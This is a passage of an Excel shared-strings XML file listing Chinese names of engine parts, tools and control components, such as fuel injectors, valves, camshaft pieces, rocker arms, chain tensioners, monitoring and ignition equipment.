  </si>
  <si>
    <t xml:space="preserve">喷油嘴.半成品                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油嘴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴，钻孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">切口滤器                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止回阀-样板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">出口滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">切口滤器-毛坯                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀片座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">探针                                                </t>
  </si>
  <si>
    <t xml:space="preserve">阀导套要求                                             </t>
  </si>
  <si>
    <t xml:space="preserve">研磨环-组合螺母支承面                                       </t>
  </si>
  <si>
    <t xml:space="preserve">压力测试泵                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷射控制屏                                             </t>
  </si>
  <si>
    <t xml:space="preserve">流动-导向轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">流动-止回阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">法兰-拆卸-止回阀                                         </t>
  </si>
  <si>
    <t xml:space="preserve">装配工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锥工具                                               </t>
  </si>
  <si>
    <t xml:space="preserve">样板-喷油器喷射试验                                        </t>
  </si>
  <si>
    <t xml:space="preserve">控制器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">测试装配说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">清洁工具.喷油嘴                                          </t>
  </si>
  <si>
    <t xml:space="preserve">拆卸杆-喷油器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴-支撑-外部                                        </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴-支撑-内部                                        </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴-阀头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴研磨心轴                                           </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器取出工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">工具                                                </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴取出工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴-钻孔                                             </t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴固定物                                             </t>
  </si>
  <si>
    <t xml:space="preserve">备用环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">喷油器体备件                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">预燃室安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">预燃室                                               </t>
  </si>
  <si>
    <t xml:space="preserve">燃油气阀导套壳体                                          </t>
  </si>
  <si>
    <t xml:space="preserve">头.燃油气阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">管子接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">盘                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">燃气喷嘴.钻孔                                           </t>
  </si>
  <si>
    <t xml:space="preserve">启动阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">阀导向装置                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀套-下级部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">阀套-上级部件                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上端固定物                                             </t>
  </si>
  <si>
    <t xml:space="preserve">关闭块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴-起动阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动空气总管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">安全帽覆盖物                                            </t>
  </si>
  <si>
    <t xml:space="preserve">磨环-起动阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">固定样板-起动阀                                          </t>
  </si>
  <si>
    <t xml:space="preserve">起动阀装配心轴                                           </t>
  </si>
  <si>
    <t xml:space="preserve">压紧弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀瓣                                                </t>
  </si>
  <si>
    <t xml:space="preserve">适配环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">块                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">止动圈                                               </t>
  </si>
  <si>
    <t xml:space="preserve">工具托架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">球                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">示功阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">气缸                                                </t>
  </si>
  <si>
    <t xml:space="preserve">方头螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀瓣                                              </t>
  </si>
  <si>
    <t xml:space="preserve">示功器接头                                             </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀锁紧螺母                                           </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀盖螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">安全阀备件清单                                           </t>
  </si>
  <si>
    <t xml:space="preserve">调节螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">连接块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴承衬                                               </t>
  </si>
  <si>
    <t xml:space="preserve">球推力块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制油-高压油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">导向装置-推力块                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴-摇臂                                              </t>
  </si>
  <si>
    <t xml:space="preserve">轴衬-摇臂                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力座                                               </t>
  </si>
  <si>
    <t xml:space="preserve">用润滑脂                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气阀导筒                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚子                                                </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮轴销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">换向轴销                                              </t>
  </si>
  <si>
    <t xml:space="preserve">螺旋弹簧                                              </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">第2部分的环                                            </t>
  </si>
  <si>
    <t xml:space="preserve">顶块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">液压管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">止推衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">套                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">油缸                                                </t>
  </si>
  <si>
    <t xml:space="preserve">油缸裙部                                              </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.阀驱动装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">阀芯                                                </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.停车阀                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导向装置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压力缸                                               </t>
  </si>
  <si>
    <t xml:space="preserve">活塞.减震器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧导向座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆护套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滚筒导向装置轴衬                                          </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂-毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">紧固模板.执行器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴-高压管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">研磨心轴导向装置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">测量工具                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀滚轮导套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓.滚轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀和泵齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套壳体                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒润滑油管                                          </t>
  </si>
  <si>
    <t xml:space="preserve">顶杆衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">修理解决方案                                            </t>
  </si>
  <si>
    <t xml:space="preserve">泵滚轮导套                                             </t>
  </si>
  <si>
    <t xml:space="preserve">六角螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">阀件驱动装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀件滚轮导套装置安装                                        </t>
  </si>
  <si>
    <t xml:space="preserve">阀推力块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">溢流阀导壳                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导向装置轴衬                                            </t>
  </si>
  <si>
    <t xml:space="preserve">控制油泵体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">止动                                                </t>
  </si>
  <si>
    <t xml:space="preserve">止动螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">溢流管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴.前端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴.后端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">带配套标记的凸轮轴                                         </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧螺钉                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴承衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">斜齿轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">连接法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">SKF联轴节                                            </t>
  </si>
  <si>
    <t xml:space="preserve">HOLSET减振器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">链轮轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴销                                                </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴截面                                             </t>
  </si>
  <si>
    <t xml:space="preserve">阀开启表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴前端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴中部                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴中部/后端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴后端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">模板-进气凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">模板-排气凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">模板.燃油凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮.公差                                             </t>
  </si>
  <si>
    <t xml:space="preserve">脉冲轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具-凸轮盘                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液压工具-联接器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">调整仪表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴调节工具                                           </t>
  </si>
  <si>
    <t xml:space="preserve">外部拧紧扳手.凸轮                                         </t>
  </si>
  <si>
    <t xml:space="preserve">台架(卸下凸轮轴)                                         </t>
  </si>
  <si>
    <t xml:space="preserve">套筒扳手.燃油凸轮                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴销规                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">材料和硬化                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接部分                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴大齿轮                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴中间.后端                                          </t>
  </si>
  <si>
    <t xml:space="preserve">燃油凸轮安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">进气凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动凸轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">几何公差                                              </t>
  </si>
  <si>
    <t xml:space="preserve">排气凸轮模板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">进气凸轮模板                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油泵及气阀机构                                           </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧片                                               </t>
  </si>
  <si>
    <t xml:space="preserve">推力盘                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴-滚筒销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">十字头块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌油缸                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌调压活塞                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌活塞                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌底块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌调节螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌调节螺母                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌调节工具                                            </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌连接块                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌锁紧销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌锁紧螺钉                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气体弹簧导壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气体弹簧活塞                                            </t>
  </si>
  <si>
    <t xml:space="preserve">气体弹簧盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">冲洗阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导向座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮箱油底壳                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导筒装置-毛坯                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴承壳体-上端部件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴承壳体-下端部件                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承螺栓                                           </t>
  </si>
  <si>
    <t xml:space="preserve">泵座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">油泵滚轮导套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导套                                                </t>
  </si>
  <si>
    <t xml:space="preserve">白合金                                               </t>
  </si>
  <si>
    <t xml:space="preserve">止动气缸支撑                                            </t>
  </si>
  <si>
    <t xml:space="preserve">垫块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">分离杆                                               </t>
  </si>
  <si>
    <t xml:space="preserve">筒形臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">挡块                                                </t>
  </si>
  <si>
    <t xml:space="preserve">轴承                                                </t>
  </si>
  <si>
    <t xml:space="preserve">联轴节                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吊架                                                </t>
  </si>
  <si>
    <t xml:space="preserve">保护衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴机架中截面                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴机架前端面                                          </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴机架后端面                                          </t>
  </si>
  <si>
    <t xml:space="preserve">换向臂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">换向连杆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">换向导向装置                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导轴                                                </t>
  </si>
  <si>
    <t xml:space="preserve">空气缸法兰                                             </t>
  </si>
  <si>
    <t xml:space="preserve">整流器体                                              </t>
  </si>
  <si>
    <r>
      <t>型板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color indexed="18"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">                                          </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">蓄压块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">三通阀支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向气缸薄垫片                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制台                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰.滚轮导套装置壳体                                       </t>
  </si>
  <si>
    <t xml:space="preserve">分离法兰.滚轮导套装置壳体                                     </t>
  </si>
  <si>
    <t xml:space="preserve">刮油环壳体                                             </t>
  </si>
  <si>
    <t xml:space="preserve">排放管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴盖上端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴盖下端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油盘板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">固定法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">回流管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">回流滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">底部塞子                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油连接管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套壳体维修                                          </t>
  </si>
  <si>
    <t xml:space="preserve">扣锁滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌滑块                                              </t>
  </si>
  <si>
    <t xml:space="preserve">扣锁塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">内嵌定位销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">扣锁定位销                                             </t>
  </si>
  <si>
    <t xml:space="preserve">滚轮导套提升工具键                                         </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导螺                                                </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮轴轴承衬套                                           </t>
  </si>
  <si>
    <t xml:space="preserve">大齿轮，曲轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴轴承                                             </t>
  </si>
  <si>
    <t xml:space="preserve">中间轮                                               </t>
  </si>
  <si>
    <t xml:space="preserve">驱动轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴承.传动轴                                            </t>
  </si>
  <si>
    <t xml:space="preserve">驱动轴齿轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">剪螺母                                               </t>
  </si>
  <si>
    <t xml:space="preserve">滑油管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">低压液压油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">高压安全阀块                                            </t>
  </si>
  <si>
    <t xml:space="preserve">喷雾嘴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">链轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">换向机构毂                                             </t>
  </si>
  <si>
    <t xml:space="preserve">换向臂止推轴承                                           </t>
  </si>
  <si>
    <t xml:space="preserve">制动圆盘毂                                             </t>
  </si>
  <si>
    <t xml:space="preserve">制动圆盘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">气阀导套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滑动套                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺母.滑动                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧挡板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">旋叶                                                </t>
  </si>
  <si>
    <t xml:space="preserve">连接管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">密封带                                               </t>
  </si>
  <si>
    <t xml:space="preserve">扣环                                                </t>
  </si>
  <si>
    <t xml:space="preserve">挠性轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">操纵螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧轮                                             </t>
  </si>
  <si>
    <t xml:space="preserve">导向螺母                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涨紧螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">涨紧螺栓轴                                             </t>
  </si>
  <si>
    <t xml:space="preserve">带法兰盘轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">锁紧垫片                                              </t>
  </si>
  <si>
    <t xml:space="preserve">观察镜                                               </t>
  </si>
  <si>
    <t xml:space="preserve">弹簧铭牌                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链条涨紧器补充                                           </t>
  </si>
  <si>
    <t xml:space="preserve">凸缘轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导向杆支撑梁                                            </t>
  </si>
  <si>
    <t xml:space="preserve">导轨支架                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴链轮                                              </t>
  </si>
  <si>
    <t xml:space="preserve">链轮-毛坯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮毂                                               </t>
  </si>
  <si>
    <t xml:space="preserve">惰轮轴                                               </t>
  </si>
  <si>
    <t xml:space="preserve">偏心链条涨紧器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">重量                                                </t>
  </si>
  <si>
    <t xml:space="preserve">调整块                                               </t>
  </si>
  <si>
    <t xml:space="preserve">螺柱端头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">启动空气分配器销规                                         </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴销规                                             </t>
  </si>
  <si>
    <t xml:space="preserve">润滑驱动销规                                            </t>
  </si>
  <si>
    <t xml:space="preserve">轴承螺柱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">滚筒链                                               </t>
  </si>
  <si>
    <t xml:space="preserve">控制驱动总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">排气凸轮毛坯                                            </t>
  </si>
  <si>
    <t xml:space="preserve">凸轮-组合式                                            </t>
  </si>
  <si>
    <t xml:space="preserve">毛坯-燃油凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">模板-燃油凸轮                                           </t>
  </si>
  <si>
    <t xml:space="preserve">燃油凸轮衬套                                            </t>
  </si>
  <si>
    <t xml:space="preserve">曲柄箱附件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">原型部件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">远程温度计支架                                           </t>
  </si>
  <si>
    <t xml:space="preserve">引导板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">引导板支撑                                             </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">温度计孔                                              </t>
  </si>
  <si>
    <t xml:space="preserve">PMI软件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">PMI系统用户手册                                         </t>
  </si>
  <si>
    <t xml:space="preserve">PMI安装和启动                                          </t>
  </si>
  <si>
    <t xml:space="preserve">计算机辅助性能分析系统                                       </t>
  </si>
  <si>
    <t xml:space="preserve">PMI供货范围                                           </t>
  </si>
  <si>
    <t xml:space="preserve">快速参考手册                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支架.传感器箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支撑.传感器箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">护罩.传感器箱                                           </t>
  </si>
  <si>
    <t xml:space="preserve">支架.传感器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">支撑.传感器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">上止点指示器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">触发环                                               </t>
  </si>
  <si>
    <t xml:space="preserve">触发环工具                                             </t>
  </si>
  <si>
    <t xml:space="preserve">连接块.触发器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">详细图纸-压力表                                          </t>
  </si>
  <si>
    <t xml:space="preserve">计算机控制监控-备件目录                                      </t>
  </si>
  <si>
    <t xml:space="preserve">计算机控制监控系统                                         </t>
  </si>
  <si>
    <t xml:space="preserve">压力控制                                              </t>
  </si>
  <si>
    <t xml:space="preserve">测试阀                                               </t>
  </si>
  <si>
    <t xml:space="preserve">高强度部件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">火花塞                                               </t>
  </si>
  <si>
    <t xml:space="preserve">点火系统总成                                            </t>
  </si>
  <si>
    <t xml:space="preserve">接线盒安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">发动机控制面板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">键盘                                                </t>
  </si>
  <si>
    <t xml:space="preserve">电源                                                </t>
  </si>
  <si>
    <t xml:space="preserve">压力计支架                                             </t>
  </si>
  <si>
    <t xml:space="preserve">开关安装                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电缆支架安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电缆系带                                              </t>
  </si>
  <si>
    <t xml:space="preserve">控制箱安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">传感器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">电缆接头                                              </t>
  </si>
  <si>
    <t xml:space="preserve">总线                                                </t>
  </si>
  <si>
    <t xml:space="preserve">遮盖物                                               </t>
  </si>
  <si>
    <t xml:space="preserve">辅助触点                                              </t>
  </si>
  <si>
    <t xml:space="preserve">调速器面板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">数据记录仪面板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">模拟计算机                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电缆暗管道（导管）                                         </t>
  </si>
  <si>
    <t xml:space="preserve">发火电缆                                              </t>
  </si>
  <si>
    <t xml:space="preserve">点火线圈                                              </t>
  </si>
  <si>
    <t xml:space="preserve">仪表清单                                              </t>
  </si>
  <si>
    <t xml:space="preserve">火化塞延伸部分                                           </t>
  </si>
  <si>
    <t xml:space="preserve">控制电路板                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电流接触器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">按钮                                                </t>
  </si>
  <si>
    <t xml:space="preserve">指示灯                                               </t>
  </si>
  <si>
    <t xml:space="preserve">灯                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">恒温器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">程序核对表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">报警面板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">摇臂滑油系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电线，单芯                                             </t>
  </si>
  <si>
    <t xml:space="preserve">辅助继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">继电器插座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电机运行电位计                                           </t>
  </si>
  <si>
    <t xml:space="preserve">处理界面                                              </t>
  </si>
  <si>
    <t xml:space="preserve">电子元件                                              </t>
  </si>
  <si>
    <t xml:space="preserve">导线管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">限位开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">起动和喷射系统箱                                          </t>
  </si>
  <si>
    <t xml:space="preserve">喷射系统箱                                             </t>
  </si>
  <si>
    <t xml:space="preserve">软管连接                                              </t>
  </si>
  <si>
    <t xml:space="preserve">软管护套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">热动继电器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">选择开关                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定时器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">断路开关，断路器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">水平开关安装                                            </t>
  </si>
  <si>
    <t xml:space="preserve">阀控制箱                                              </t>
  </si>
  <si>
    <t xml:space="preserve">支架布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">油雾探测器布置                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电容器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">接线板零件                                             </t>
  </si>
  <si>
    <t xml:space="preserve">恒温/恒压器布置                                          </t>
  </si>
  <si>
    <t xml:space="preserve">指示盒（盒）                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电缆                                                </t>
  </si>
  <si>
    <t xml:space="preserve">橡胶衬套                                              </t>
  </si>
  <si>
    <t xml:space="preserve">R/I转换器                                            </t>
  </si>
  <si>
    <t xml:space="preserve">液位控制器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">隔离放大器                                             </t>
  </si>
  <si>
    <t xml:space="preserve">变压器                                               </t>
  </si>
  <si>
    <t xml:space="preserve">保护井                                               </t>
  </si>
  <si>
    <t xml:space="preserve">遥控箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">校准曲线                                              </t>
  </si>
  <si>
    <t xml:space="preserve">预润滑油泵启动器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">遥控温度计                                             </t>
  </si>
  <si>
    <t xml:space="preserve">继电器箱                                              </t>
  </si>
  <si>
